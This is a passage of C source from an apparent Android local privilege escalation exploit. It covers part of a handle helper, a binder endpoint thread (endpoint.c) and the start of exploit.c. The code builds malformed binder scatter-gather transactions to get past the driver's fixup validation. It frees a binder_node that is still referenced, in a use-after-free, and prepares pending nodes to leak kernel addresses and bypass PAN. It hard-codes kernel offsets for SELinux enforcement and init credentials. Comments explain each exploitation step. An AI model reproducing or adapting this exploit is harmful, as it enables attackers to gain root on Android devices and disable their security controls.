(uint64_t)offs - (uint64_t)offsets; 418 | writebuf.txn.data.ptr.buffer = txn_data; 419 | writebuf.txn.data.ptr.offsets = offsets; 420 | 421 | /* Align buffers size. */ 422 | while (buffers_size % 8) 423 | buffers_size++; 424 | writebuf.buffers_size = buffers_size; 425 | 426 | bwr.write_size = sizeof(writebuf); 427 | bwr.write_consumed = 0; 428 | bwr.write_buffer = &writebuf; 429 | bwr.read_size = 0; 430 | bwr.read_consumed = 0; 431 | bwr.read_buffer = 0; 432 | 433 | /* Send query. 
*/
434 |     ioctl(bs->fd, BINDER_WRITE_READ, &bwr);
435 |     uint32_t remaining, consumed;
436 |     uint32_t rdata[32];
437 |     remaining = 0, consumed = 0;
438 | 
439 |     while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_REPLY);
440 | 
441 |     struct binder_transaction_data *tr = (struct binder_transaction_data *)((uint8_t*)rdata + consumed - sizeof(*tr));
442 | 
443 |     struct flat_binder_object *fbo = (struct flat_binder_object *)(tr->data.ptr.buffer + 4);
444 | 
445 |     binder_acquire(bs, fbo->handle);
446 | 
447 |     return fbo->handle;
448 | }
449 | 
450 | uint32_t grab_handle(struct binder_state *bs, char *name)
451 | {
452 | 
453 |     uint64_t tm = find_hwservice(bs, TOKEN_MANAGER);
454 | 
455 |     hidl_vec *token = get_service_token(name);
456 |     if (!token)
457 |         return 0;
458 | 
459 |     uint32_t handle = get_by_token(bs, tm, token);
460 | 
461 |     binder_release(bs, tm);
462 |     return handle;
463 | }
464 | 
465 | int publish_handle(struct binder_state *bs, uint64_t handle, char *name)
466 | {
467 |     uint64_t tm = find_hwservice(bs, TOKEN_MANAGER);
468 | 
469 |     hidl_vec *vec = create_token(bs, tm, handle);
470 |     if (!vec)
471 |         return 0;
472 | 
473 |     /* Make the association. */
474 |     add_service_token(name, vec);
475 | 
476 | 
477 |     /* Release the reference. */
478 |     binder_release(bs, tm);
479 | 
480 |     return 1;
481 | }
482 | 
483 | 
--------------------------------------------------------------------------------
/lpe/src/endpoint.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <stdlib.h>
3 | #include <string.h>
4 | #include <errno.h>
5 | #include <unistd.h>
6 | #include <signal.h>
7 | #include <setjmp.h>
8 | #include <pthread.h>
9 | #include <sched.h>
10 | #include <sys/syscall.h>
11 | #include <sys/wait.h>
12 | 
13 | #include "binder.h"
14 | #include "handle.h"
15 | #include "log.h"
16 | #include "endpoint.h"
17 | #include "pending_node.h"
18 | 
19 | 
20 | static struct endpoint_handle *endpoints = NULL;
21 | 
22 | static int endpoint_transaction_handler(struct endpoint_handle *handle, struct binder_transaction_data *tr, struct binder_io *msg, struct binder_io *reply)
23 | {
24 | 
25 |     int res = 1;
26 |     struct binder_state *bs = handle->bs;
27 |     pthread_t th;
28 | 
29 |     switch (tr->code) {
30 |     case GET_VMA_START:
31 |         /* Return the mapping address in two 32-bit halves. */
32 |         bio_put_uint32(reply, (uint32_t)bs->mapped);
33 |         bio_put_uint32(reply, (uint32_t)(((uint64_t)(bs->mapped)>>32)));
34 |         res = 0;
35 |         break;
36 |     case EXCHANGE_HANDLES:
37 |         handle->client_handle = bio_get_ref(msg);
38 |         /* Acquire the handle. */
39 |         binder_acquire(bs, handle->client_handle);
40 | 
41 |         /* Create the vulnerable node in the process. */
42 |         bio_put_obj(reply, bs->mapped + 0xe8);
43 |         uint64_t node2 = bs->mapped + 0xe8;
44 |         node2 = node2 & 0xFFFFFFFF;
45 |         node2 = node2 << 32;
46 |         node2 += 0x42;
47 | 
48 |         bio_put_obj(reply, node2);
49 |         res = 0;
50 |         break;
51 |     case ADD_PENDING_NODE:
52 |         add_pending_node(bs, handle->client_handle);
53 |         //uaf_node_th = add_pending_node(bs, client_handle);
54 |         //log_info("uaf_node_th: %p\n", uaf_node_th);
55 |         res = 0;
56 |         break;
57 |     case TERMINATE_PENDING_NODE:
58 |         th = bio_get_uint32(msg); th += ((uint64_t)bio_get_uint32(msg)) << 32; /* low word first; in a single expression the order of the two calls would be unspecified */
59 |         terminate_pending_node(th);
60 |         res = 0;
61 |         break;
62 |     case RESERVE_BUFFER:
63 |         if (handle->reserved_buffer) {
64 |             log_err("A buffer is already reserved. Free it if you want to reserve another one.\n");
65 |             res = -1;
66 |             break;
67 |         }
68 |         else {
69 |             handle->reserved_buffer = tr->data.ptr.buffer;
70 |             res = 42; /* Instruct the calling function to skip freeing the buffer. */
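            /* The 42 status is picked up by the endpoint's read loop further
             * down: for a one-way transaction it skips binder_free_buffer(),
             * and for a call it replies without handing the buffer back, so
             * the allocation stays parked inside the endpoint's 128KB binder
             * area until a FREE_RESERVED_BUFFER request arrives. */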
71 |         }
72 |         break;
73 |     case FREE_RESERVED_BUFFER:
74 |         if (handle->reserved_buffer) {
75 |             binder_free_buffer(bs, handle->reserved_buffer);
76 |             handle->reserved_buffer = 0;
77 |         }
78 |         res = 0;
79 |         break;
80 |     case TRIGGER_DECREF:
81 |         res = 0;
82 |         break;
83 |     default:
84 |         log_err("[-] Unknown transaction code.\n");
85 |         break;
86 |     }
87 | 
88 | 
89 |     return res;
90 | 
91 | }
92 | 
93 | static struct endpoint_handle *_lookup_by_name(const char *name)
94 | {
95 |     struct endpoint_handle *handle = endpoints;
96 | 
97 |     while (handle) {
98 |         if (!strcmp(name, handle->name))
99 |             return handle;
100 |         handle = handle->next;
101 |     }
102 | 
103 |     return NULL;
104 | }
105 | 
106 | static struct endpoint_handle *_lookup_by_pid(pid_t pid)
107 | {
108 |     struct endpoint_handle *handle = endpoints;
109 | 
110 |     while (handle) {
111 |         if (handle->pid == pid)
112 |             return handle;
113 |         handle = handle->next;
114 |     }
115 | 
116 |     return NULL;
117 | }
118 | 
119 | 
120 | void plop(int sig)
121 | {
122 |     struct endpoint_handle *handle = NULL;
123 | 
124 |     /* Setup jmpbufs. */
125 |     handle = _lookup_by_pid(syscall(__NR_gettid));
126 | 
127 |     /* Close binder to release the UAFed pending nodes.
128 |      * This is the only way to actually free them without entering
129 |      * the binder_transaction_buffer_release() function.
130 |      */
131 |     binder_close(handle->bs);
132 |     handle->status = 0;
133 | 
134 |     /* longjmp. */
135 |     longjmp(handle->env, 0);
136 | 
137 | }
138 | 
139 | 
140 | /*
141 |  * The binder endpoint thread.
142 |  */
143 | static void *endpoint_thread(void *args)
144 | {
145 |     uint8_t data[128];
146 |     uint32_t remaining = 0;
147 |     uint32_t consumed = 0;
148 |     struct endpoint_handle *handle = (struct endpoint_handle *)args;
149 | 
150 | 
151 |     setjmp(handle->env);
152 | 
153 |     signal(SIGTERM, plop);
154 | 
155 |     handle->bs = binder_open(BINDER_DEVICE, 128 * 1024);
156 |     if (!handle->bs) {
157 |         log_err("[-] Failed to open binder device.\n");
158 |         goto error;
159 |     }
160 | 
161 |     /* Publish our endpoint name using the fake system server of our APK. */
162 |     if (!publish_handle(handle->bs, 0x42, handle->name)) {
163 |         log_err("[-] Failed to publish handle\n");
164 |         goto error;
165 |     }
166 | 
167 |     /* Enter looper. */
168 |     uint32_t looper = BC_ENTER_LOOPER;
169 |     binder_write(handle->bs, &looper, sizeof(looper));
170 | 
171 |     /* Everything's fine. */
172 |     handle->status = 1;
173 |     pthread_barrier_wait(&handle->barrier);
174 | 
175 |     /* We do this "manually" and don't rely too much on the binder api because
176 |      * we do some weird things.
177 |      */
178 |     uint32_t cmd;
179 |     struct binder_transaction_data *tr;
180 | 
181 | 
182 |     while ((cmd = binder_read_next(handle->bs, data, &remaining, &consumed))) {
183 |         switch (cmd) {
184 |         case BR_DECREFS:
185 |             break;
186 |         case BR_TRANSACTION: {
187 |             uint8_t rdata[256];
188 |             struct binder_io msg;
189 |             struct binder_io reply;
190 |             int res;
191 | 
192 |             tr = (struct binder_transaction_data *)(data + consumed - sizeof(*tr));
193 |             bio_init(&reply, rdata, sizeof(rdata), 4);
194 |             bio_init_from_txn(&msg, tr);
195 |             res = endpoint_transaction_handler(handle, tr, &msg, &reply);
196 |             if (tr->flags & TF_ONE_WAY) {
197 |                 if (res == 42)
198 |                     continue;
199 |                 binder_free_buffer(handle->bs, tr->data.ptr.buffer);
200 |             } else {
201 |                 if (res == 42)
202 |                     /* we reply, but skip freeing the buffer. */
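                    /* Passing NULL as the buffer keeps the kernel-side
                     * allocation alive after the reply; it is only handed
                     * back later through a FREE_RESERVED_BUFFER call. */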
203 |                     binder_send_reply(handle->bs, &reply, NULL, 0);
204 |                 else
205 |                     binder_send_reply(handle->bs, &reply, tr->data.ptr.buffer, 0);
206 |             }
207 |             break;
208 |         }
209 |         default:
210 |             break;
211 |         }
212 |     }
213 | 
214 | 
215 |     exit(0);
216 | error:
217 |     handle->status = -1;
218 |     pthread_barrier_wait(&handle->barrier);
219 |     exit(0);
220 | }
221 | 
222 | 
223 | 
224 | void endpoint_reset(const char *endpoint_name)
225 | {
226 |     struct endpoint_handle *handle = NULL;
227 | 
228 |     /* Check that an endpoint with that name actually exists. */
229 |     if ((handle = _lookup_by_name(endpoint_name)) == NULL) {
230 |         log_err("[-] No endpoint exists with that name\n");
231 |         return;
232 |     }
233 | 
234 |     /* Reset the endpoint. */
235 |     kill(handle->pid, SIGTERM);
236 | 
237 |     /* Wait on barrier. */
238 |     pthread_barrier_wait(&handle->barrier);
239 | }
240 | 
241 | static void endpoint_handle_free(struct endpoint_handle *handle)
242 | {
243 |     struct endpoint_handle *tmp = endpoints;
244 | 
245 | 
246 |     /* Start by removing from linked list. */
247 |     if (handle == endpoints) {
248 |         endpoints = handle->next;
249 |     } else {
250 |         while (tmp->next != handle)
251 |             tmp = tmp->next;
252 |         /* Remove */
253 |         tmp->next = handle->next;
254 |     }
255 | 
256 |     free(handle->name);
257 |     free(handle->stack);
258 |     binder_close(handle->bs);
259 |     free(handle);
260 | }
261 | 
262 | /*
263 |  * Bootstrap the binder endpoint.
264 |  */
265 | bool bootstrap_endpoint(const char *endpoint_name)
266 | {
267 |     struct endpoint_handle *handle = NULL;
268 | 
269 | 
270 |     /* Double check that the name doesn't already exist. */
271 |     if (_lookup_by_name(endpoint_name) != NULL) {
272 |         log_err("[-] An endpoint already exists with that name\n");
273 |         return false;
274 |     }
275 | 
276 |     /* Allocate handle. */
277 |     handle = malloc(sizeof(*handle));
278 |     if (!handle) { /* malloc() returns NULL on failure, not -1. */
279 |         log_err("[-] Unable to allocate endpoint handle. Reason: '%s'\n", strerror(errno));
280 |         return false;
281 |     }
282 | 
283 |     memset(handle, 0, sizeof(*handle));
284 | 
285 |     if (pthread_barrier_init(&handle->barrier, NULL, 2)) {
286 |         perror("pthread_barrier_init");
287 |         return false;
288 |     }
289 | 
290 |     handle->next = NULL;
291 |     handle->stack = malloc(65536);
292 |     handle->name = strdup(endpoint_name);
293 |     handle->status = 0;
294 |     handle->pid = clone((int (*)(void *))endpoint_thread, handle->stack + 65536, CLONE_VM|SIGCHLD, handle);
295 | 
296 | 
297 |     /* Wait on the barrier for the endpoint creation to be complete. */
298 |     pthread_barrier_wait(&handle->barrier);
299 | 
300 |     if (handle->status < 0) {
301 |         int status;
302 |         waitpid(handle->pid, &status, 0);
303 |         endpoint_handle_free(handle);
304 |         return false;
305 |     }
306 | 
307 |     /* Insert the endpoint in the linked list. */
308 |     if (!endpoints)
309 |         endpoints = handle;
310 |     else {
311 |         struct endpoint_handle *tmp = endpoints;
312 |         while (tmp->next != NULL)
313 |             tmp = tmp->next;
314 |         /* Insert at the tail. */
315 |         tmp->next = handle;
316 |     }
317 | 
318 |     return true;
319 | }
320 | 
321 | bool terminate_endpoint(const char *endpoint_name)
322 | {
323 |     struct endpoint_handle *handle = _lookup_by_name(endpoint_name);
324 |     int status;
325 | 
326 |     if (!handle) {
327 |         log_err("[-] No endpoint named: '%s'\n", endpoint_name);
328 |         exit(1);
329 |         return false;
330 |     }
331 |     kill(handle->pid, SIGKILL);
332 |     waitpid(handle->pid, &status, 0);
333 | 
334 |     endpoint_handle_free(handle);
335 | 
336 |     return true;
337 | }
338 | 
339 | struct endpoint_handle *get_endpoints()
340 | {
341 |     return endpoints;
342 | }
343 | 
344 | 
--------------------------------------------------------------------------------
/lpe/src/exploit.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <stdlib.h>
3 | #include <string.h>
4 | #include <stdbool.h>
5 | #include <errno.h>
6 | #include <unistd.h>
7 | #include <fcntl.h>
8 | #include <signal.h>
9 | #include <pthread.h>
10 | #include <linux/fs.h>
11 | #include <sys/ioctl.h>
12 | #include <sys/mman.h>
13 | #include <sys/wait.h>
14 | #include <sys/epoll.h>
15 | 
16 | #include "node.h"
17 | #include "exploit.h"
18 | #include "handle.h"
19 | #include "binder.h"
20 | #include "log.h"
21 | #include "endpoint.h"
22 | #include "pending_node.h"
23 | 
24 | #define BINDER_BUFFER_SZ (128 * 1024)
25 | #define RESERVED_BUFFER_SZ (127 * 1024)
26 | 
27 | #define KERNEL_MAGIC ((unsigned long)0x644d5241) /* "ARMd", at offset 0x38 of the kernel image. */
28 | 
29 | #define SELINUX_ENFORCING_OFFSET 0x2ba4000
30 | #define MEMSTART_ADDR_OFFSET 0x20d1090
31 | #define SYSCTL_TABLE_ROOT_OFFSET 0x29da3f8
32 | #define PROC_DOUINTVEC_OFFSET 0x196775c
33 | #define INIT_TASK_OFFSET 0x29a1e80L
34 | #define INIT_CRED_OFFSET 0x29b00a0
35 | #define OFFSET_PIPE_FOP 0x1f2f650
36 | 
37 | #define TASKS_OFFSET 0x570
38 | #define PID_OFFSET 0x670
39 | #define MM_OFFSET 0x5c0
40 | #define REAL_CRED_OFFSET 0x838
41 | 
42 | char pathname[64];
43 | 
44 | 
45 | uint64_t reserved_buffer_sz = 0;
46 | uint64_t memstart_addr = 0;
47 | uint64_t kernel_base = 0;
48 | 
49 | /*
50 |  * Convert physical address to kernel virtual address.
51 |  */
52 | 
53 | uint64_t phys_to_virt(uint64_t phys)
54 | {
55 |     return (phys - memstart_addr) | 0xFFFFFFC000000000;
56 | }
57 | 
58 | /*
59 |  * Trigger the bug, and free the pending node, on which we still have
60 |  * a reference. This will be the primitive for all the exploitation.
61 |  */
62 | void dec_node(struct binder_state *bs, uint64_t target, uint64_t vma_start, bool strong, bool second)
63 | {
64 | 
65 |     struct binder_transaction_data_sg sg;
66 |     struct binder_transaction_data *td;
67 |     struct binder_write_read bwr;
68 | 
69 |     uint64_t handle = 0; /* It *SHOULD* be 0, as it is the value of the ref created from the ctx mgr node. */
70 | 
71 |     /* Send a big buffer. */
72 | 
73 |     uint32_t tr_size = reserved_buffer_sz; // Use a query size of 0x20000 (we subtract 0x10 for the secctx)
74 |     uint8_t data[BINDER_BUFFER_SZ];
75 |     uint64_t offsets[128];
76 |     uint8_t sg_buf[0x1000];
77 |     uint32_t readbuf[32];
78 |     uint8_t *ptr = data;
79 |     uint64_t *offs = offsets;
80 |     uint8_t buf[0x100];
81 |     uint32_t buflen = 0;
82 | 
83 | 
84 |     /*
85 |      * Used to perform BC_TRANSACTION_SG queries.
86 |      */
87 |     struct {
88 |         uint32_t cmd;
89 |         struct binder_transaction_data txn;
90 |         binder_size_t buffers_size;
91 |     } __attribute__((packed)) writebuf;
92 | 
93 |     *(uint64_t *)(data + 0xe8) = 0x40; // offset of valid BINDER_TYPE_PTR
94 |     /* The purpose of this apparently useless transaction is to initialize the content of the qword at
95 |      * offset 0xf0 from the beginning of the transaction buffer of the servicemanager.
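 * (Rough arithmetic, ignoring the secctx adjustment mentioned above: the
 * crafted transaction below carries one flat_binder_object (0x18 bytes) and
 * four binder_buffer_objects (0x28 each), i.e. 0xb8 bytes of objects, so the
 * offsets array starts at 0xb8 in the target buffer, and the bogus parent
 * index 6 makes the driver read offs[6] at 0xb8 + 6*8 = 0xe8 -- past the
 * four real entries and inside the scatter-gather area that this failed
 * transaction pre-seeds through the write to data + 0xe8.)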
96 |      * I used a transaction size of 0x20000 to be sure to get the whole buffer for myself, and this way
97 |      * be sure to be handed the very beginning of the transaction buffer.
98 |      */
99 |     // the transaction won't make it through, as it will fail trying to copy from a NULL userland pointer
100 |     binder_transaction(bs, false, target, data, tr_size, NULL, 1);
101 | 
102 | 
103 |     /* Wait for the BR_FAILED_REPLY. */
104 |     uint32_t remaining = 0, consumed = 0;
105 |     while (binder_read_next(bs, data, &remaining, &consumed) != BR_FAILED_REPLY);
106 | 
107 |     memset(buf, 0, 0x100);
108 |     memset(offsets, 0, 128 * sizeof(uint64_t));
109 | 
110 |     /* From here it gets a little bit messy / crafty. */
111 | 
112 |     /*
113 |      * Create the first valid object, which will be smashed after the bug has been successfully triggered.
114 |      */
115 |     struct flat_binder_object *fbo = (struct flat_binder_object *)ptr;
116 |     fbo->hdr.type = strong ? BINDER_TYPE_HANDLE : BINDER_TYPE_WEAK_HANDLE;
117 |     fbo->flags = 0;
118 |     fbo->handle = target;
119 |     fbo->cookie = 0;
120 |     *(offs++) = ((uint8_t *)fbo) - data;
121 |     ptr = ++fbo;
122 | 
123 | 
124 |     /*
125 |      * Here we craft a BINDER_TYPE_PTR which won't be added to the offsets array, and will thus not be validated by the binder
126 |      * driver. It will be used later, once the bug is triggered and we can make the `parent` pointer point to this object.
127 |      * As it isn't validated, we can assign it an arbitrary length. The sole purpose of this object is to use the
128 |      * binder parent fixup code to overwrite a qword at an "arbitrary" offset with the userland address of a child buffer.
129 |      * This is the primitive which is used to overwrite the handle value of the BINDER_TYPE_HANDLE we created above.
130 |      */
131 |     struct binder_buffer_object *bbo = (struct binder_buffer_object *)(ptr); //For now, we assume the fd will be 4
132 |     bbo->hdr.type = BINDER_TYPE_PTR;
133 |     bbo->flags = 0;
134 |     bbo->buffer = vma_start; /* This *MUST* be the address of the beginning of the userland mapping of /dev/binder. */
135 |     bbo->length = 0xdeadbeefbadc0ded;
136 |     bbo->parent = 0;
137 |     bbo->parent_offset = 0;
138 |     ptr = ++bbo;
139 | 
140 |     /* This one is the official one. */
141 |     bbo->hdr.type = BINDER_TYPE_PTR;
142 |     bbo->flags = 0;
143 |     bbo->buffer = sg_buf;
144 |     bbo->length = 0x10;
145 |     bbo->parent = 0;
146 |     bbo->parent_offset = 0;
147 | 
148 |     // Add it to the offsets array
149 |     *(offs++) = ((uint8_t *)bbo) - data;
150 |     ptr = ++bbo;
151 | 
152 |     /* We create an additional BINDER_TYPE_PTR, whose parent will be the one we created just above. This is where the bug is triggered,
153 |      * as the bbo->parent index is set to 6, which is wrong as it is greater than the number of entries in the offsets array. offs[6] will thus end up pointing into
154 |      * not yet initialized data reserved for the sg_buf. The whole purpose of the seemingly useless first transaction was to initialize this address with the
155 |      * value 0x40, which is the offset of the previous BINDER_TYPE_PTR object, in order for the `binder_validate_ptr` and `binder_validate_fixup` functions to succeed.
156 |      * This BINDER_TYPE_PTR is then eventually validated and `last_fixup_obj_off` is set to the offset of this object.
157 |      * This implies that we just validated a BINDER_TYPE_PTR whose bbo->parent index points at an array entry which will be modified by the next BINDER_TYPE_PTR below
158 |      * when the driver processes it.
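 * For reference, the transaction data assembled above and below looks
 * roughly like this (flat_binder_object is 0x18 bytes, binder_buffer_object
 * 0x28 bytes):
 *
 *   0x00  flat_binder_object   HANDLE/WEAK_HANDLE        offs[0]
 *   0x18  binder_buffer_object PTR, unvalidated          (not in offsets)
 *   0x40  binder_buffer_object PTR, length 0x10          offs[1]
 *   0x68  binder_buffer_object PTR, parent = 6           offs[2]  <- triggers the bug
 *   0x90  binder_buffer_object PTR, parent = 6           offs[3]  <- rewrites offs[6]
 *
 * which is where the magic offsets 0x18 and 0x40 in this comment and the
 * ones around it come from.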
159 |      */
160 |     bbo->hdr.type = BINDER_TYPE_PTR;
161 |     bbo->flags = BINDER_BUFFER_FLAG_HAS_PARENT;
162 |     bbo->buffer = NULL;
163 |     bbo->length = 0;
164 |     bbo->parent = 6;
165 |     bbo->parent_offset = 0;
166 |     buflen += bbo->length;
167 | 
168 |     // Add it to the offsets array
169 |     *(offs++) = ((uint8_t *)bbo) - data;
170 |     ptr = ++bbo;
171 | 
172 |     /*
173 |      * And finally, the last nail in the coffin.
174 |      * We craft almost exactly the same BINDER_TYPE_PTR as above, still with a parent index of 6. This time however, we specify a 'buffer' whose data will be copied in
175 |      * before the BINDER_TYPE_PTR is validated. This qword will overwrite the value at offs[6], replacing the value 0x40, pointing to a validated BINDER_TYPE_PTR, with the value 0x18,
176 |      * which points to the very first BINDER_TYPE_PTR, which wasn't validated by the binder driver as we haven't added its offset to the offsets array. The following will now happen
177 |      * in `binder_fixup_parent()`:
178 |      * ```c
179 |     2884                 parent = binder_validate_ptr(target_proc, b, &object, bp->parent,
180 |     2885                                              off_start_offset, &parent_offset,
181 |     2886                                              num_valid);
182 |     ...
183 |     2893                 if (!binder_validate_fixup(target_proc, b, off_start_offset,
184 |     2894                                            parent_offset, bp->parent_offset,
185 |     2895                                            last_fixup_obj_off,
186 |     2896                                            last_fixup_min_off)) {
187 |     2897                         binder_user_error("%d:%d got transaction with out-of-order buffer fixup\n",
188 |     2898                                           proc->pid, thread->pid);
189 |     2899                         return -EINVAL;
190 |     2900                 }
191 |      * ```
192 |      * Here, parent will now point to the unvalidated BINDER_TYPE_PTR; however, to be used by the driver it needs to be validated by the `binder_validate_fixup()` function:
193 |      * ```c
194 |      * 2414 static bool binder_validate_fixup(struct binder_proc *proc,
195 |     2415                                    struct binder_buffer *b,
196 |     2416                                    binder_size_t objects_start_offset,
197 |     2417                                    binder_size_t buffer_obj_offset,
198 |     2418                                    binder_size_t fixup_offset,
199 |     2419                                    binder_size_t last_obj_offset,
200 |     2420                                    binder_size_t last_min_offset)
201 |     2421 {
202 |     ...
203 |     2427         while (last_obj_offset != buffer_obj_offset) {
204 |     2428                 unsigned long buffer_offset;
205 |     2429                 struct binder_object last_object;
206 |     2430                 struct binder_buffer_object *last_bbo;
207 |     2431                 size_t object_size = binder_get_object(proc, b, last_obj_offset,
208 |     2432                                                        &last_object);
209 |     2433                 if (object_size != sizeof(*last_bbo))
210 |     2434                         return false;
211 |     2435
212 |     2436                 last_bbo = &last_object.bbo;
213 |     2437                 *
214 |     2438                 * Safe to retrieve the parent of last_obj, since it
215 |     2439                 * was already previously verified by the driver.
216 |     2440                 *
217 |     2441                 if ((last_bbo->flags & BINDER_BUFFER_FLAG_HAS_PARENT) == 0)
218 |     2442                         return false;
219 |     2443                 last_min_offset = last_bbo->parent_offset + sizeof(uintptr_t);
220 |     2444                 buffer_offset = objects_start_offset +
221 |     2445                         sizeof(binder_size_t) * last_bbo->parent,
222 |     2446                 binder_alloc_copy_from_buffer(&proc->alloc, &last_obj_offset,
223 |     2447                                               b, buffer_offset,
224 |     2448                                               sizeof(last_obj_offset));
225 |     2449         }
226 |     2450         return (fixup_offset >= last_min_offset);
227 |     2451 }
228 |     ```
229 |     Here, as the `last_bbo` pointer was previously validated by the driver, it is trusted, and in particular its `parent` field is trusted. However, the value of
230 |     last_bbo->parent is now `0x18` instead of `0x40`, which ends up setting `last_obj_offset` to the same value as `buffer_obj_offset` (which is the offset of the
231 |     fake BINDER_TYPE_PTR), and exits the loop. From now on, the driver will be manipulating an unvalidated object.
The following code will try to fixup the buffer address 232 | in the fake BINDER_TYPE_PTR object: 233 | ```c 234 | 2909 buffer_offset = bp->parent_offset + 235 | 2910 (uintptr_t)parent->buffer - (uintptr_t)b->user_data; 236 | 2911 binder_alloc_copy_to_buffer(&target_proc->alloc, b, buffer_offset, 237 | 2912 &bp->buffer, sizeof(bp->buffer)); 238 | ``` 239 | As the parent->buffer is equal to b->user_data, only the parent_offset which is 8, is taken into account. This means that the userland address of the 240 | bp->buffer will be copied at the offset 8 from the beginning of the binder buffer, which happens to be the offset of the node value of the BINDER_TYPE_HANDLE 241 | (which has meanwhile been transformed into a BINDER_TYPE_BINDER by the binder driver) object we added at the beginning of the transaction. When eventually entering 242 | the binder_transaction_buffer_release() function, the driver will fail trying to decrement the invalid node. 243 | */ 244 | uint64_t new_off = 0x18; 245 | bbo->hdr.type = BINDER_TYPE_PTR; 246 | bbo->flags = BINDER_BUFFER_FLAG_HAS_PARENT; 247 | bbo->buffer = &new_off; 248 | bbo->length = sizeof(new_off); 249 | bbo->parent = 0x6; // offs[6] = 0x18; 250 | bbo->parent_offset = 0x8 + ((second == true) ? 4 : 0); 251 | *(offs++) = ((uint8_t *)bbo) - data; 252 | ptr = ++bbo; 253 | 254 | /* Send the BC_TRANSACTION_SG transaction. */ 255 | writebuf.cmd = BC_TRANSACTION_SG; 256 | //writebuf.txn.target.handle = 0; // Ctxt mgr 257 | writebuf.txn.target.handle = target; // endpoint 258 | writebuf.txn.code = TRIGGER_DECREF; 259 | writebuf.txn.flags = 0; 260 | writebuf.txn.data_size = ((uint8_t*)ptr) - ((uint8_t *)data); 261 | writebuf.txn.offsets_size = ((uint8_t*)offs) - ((uint8_t *)offsets); 262 | writebuf.txn.data.ptr.buffer = data; 263 | writebuf.txn.data.ptr.offsets = offsets; 264 | buflen = tr_size - writebuf.txn.data_size - writebuf.txn.offsets_size; 265 | writebuf.buffers_size = buflen; 266 | 267 | bwr.write_size = sizeof(writebuf); 268 | bwr.write_consumed = 0; 269 | bwr.write_buffer = &writebuf; 270 | bwr.read_size = 0; 271 | bwr.read_consumed = 0; 272 | bwr.read_buffer = 0; 273 | 274 | /* Send bogus query. */ 275 | ioctl(bs->fd, BINDER_WRITE_READ, &bwr); 276 | 277 | /* Wait for the reply and free. */ 278 | remaining = 0, consumed = 0; 279 | while (binder_read_next(bs, data, &remaining, &consumed) != BR_REPLY); 280 | 281 | /* Free the transaction buffer. */ 282 | td = (struct binder_transaction_data *)(data + consumed - sizeof(*td)); 283 | /* Free buffer. */ 284 | binder_free_buffer(bs, td->data.ptr.buffer); 285 | } 286 | 287 | 288 | /* 289 | * Do all the preparation for the exploitation, that is setup up a number of pending nodes 290 | * on the soon to be dangling `binder_node`. I used multiple pending nodes as I need to leak values 291 | * multiple times in order to disclose the kernel address of the dangling `binder_node`, and know 292 | * where I add controlled kernel data in order to bypass PAN. 293 | */ 294 | uint64_t setup_pending_nodes(struct binder_state *bs, uint64_t endpoint_handle, pthread_t *th, uint32_t n1, uint32_t n2) 295 | { 296 | struct binder_transaction_data *tr; 297 | uint8_t txn_data[BINDER_BUFFER_SZ]; 298 | uint8_t rdata[512]; 299 | uint64_t uaf_node = 0, uaf_node2 = 0; 300 | uint32_t remaining = 0, consumed = 0; 301 | struct binder_transaction_data *t = (struct binder_transaction_data *)(rdata + sizeof(uint32_t)); 302 | 303 | struct binder_io msg, reply; 304 | 305 | /* Free the reserved buffer. 
As we only perform
306 |  * transactions up to this size afterwards, which won't require creating pending nodes,
307 |  * it should be alright.
308 |  */
309 |     bio_init(&msg, txn_data, sizeof(txn_data), 10);
310 |     bio_init(&reply, rdata, sizeof(rdata), 10);
311 | 
312 |     /* Free the reserved buffer. */
313 |     if (binder_call(bs, &msg, &reply, endpoint_handle, FREE_RESERVED_BUFFER) < 0) {
314 |         log_err("[-] Binder call FREE_RESERVED_BUFFER failed.\n");
315 |         exit(1);
316 |     }
317 |     binder_free_buffer(bs, reply.data0);
318 | 
319 | 
320 |     /* Compute the reserved buffer size, and ask the endpoint to reserve it. */
321 |     reserved_buffer_sz = RESERVED_BUFFER_SZ - (n1 + n2) * 0x10;
322 |     make_transaction(rdata, false, endpoint_handle, txn_data, reserved_buffer_sz, NULL, 0);
323 |     t->code = RESERVE_BUFFER;
324 |     /* Make the call. */
325 |     binder_write(bs, rdata, sizeof(*t) + sizeof(uint32_t));
326 | 
327 |     /* Wait for the BR_REPLY. */
328 |     while (binder_read_next(bs, rdata, &remaining, &consumed) != BR_REPLY);
329 |     /* Free the transaction. */
330 |     tr = (struct binder_transaction_data *)((uint8_t*)rdata + consumed - sizeof(*tr));
331 |     binder_free_buffer(bs, tr->data.ptr.buffer);
332 | 
333 |     bio_init(&msg, txn_data, sizeof(txn_data), 10);
334 |     bio_init(&reply, rdata, sizeof(rdata), 10);
335 | 
336 |     /* Retrieve the vma_start address of the endpoint. */
337 |     if (binder_call(bs, &msg, &reply, endpoint_handle, GET_VMA_START) < 0) {
338 |         log_err("[-] Binder call GET_VMA_START failed.\n");
339 |         exit(1);
340 |     }
341 | 
342 |     uint64_t vma_start = bio_get_uint32(&reply); vma_start += ((uint64_t)bio_get_uint32(&reply)) << 32; /* low word first; one expression would leave the call order unspecified */
343 |     binder_free_buffer(bs, reply.data0);
344 | 
345 |     /* Now we exchange handles, so as to create the vulnerable node and let the endpoint
346 |      * reach back to us.
347 |      */
348 |     bio_init(&msg, txn_data, sizeof(txn_data), 10);
349 |     bio_init(&reply, rdata, sizeof(rdata), 10);
350 | 
351 |     bio_put_obj(&msg, (void *)0x4141); //Add arbitrary node value
352 |     if (binder_call(bs, &msg, &reply, endpoint_handle, EXCHANGE_HANDLES) < 0) {
353 |         log_err("[-] Binder call EXCHANGE_HANDLES failed.\n");
354 |         exit(1);
355 |     }
356 | 
357 |     /* The endpoint should have created a ref to the uaf node. */
358 |     uaf_node = bio_get_ref(&reply);
359 |     if (!uaf_node) {
360 |         log_err("[-] Failed to grab a reference to the UAF node.\n");
361 |         exit(1);
362 |     }
363 | 
364 |     /* Take a reference to the node. */
365 |     binder_acquire(bs, uaf_node);
366 | 
367 |     uaf_node2 = bio_get_ref(&reply);
368 |     if (!uaf_node2) {
369 |         log_err("[-] Failed to grab a reference to the UAF node.\n");
370 |         exit(1);
371 |     }
372 | 
373 |     /* Take a reference to the node. */
374 |     binder_acquire(bs, uaf_node2);
375 | 
376 | 
377 |     /* Free the buffer. */
378 |     binder_free_buffer(bs, reply.data0);
379 | 
380 |     int i;
381 |     pthread_t node_th;
382 | 
383 |     for (i = 0; i < n1; i++) {
384 |         /* Create the pending nodes on the first uaf node. */
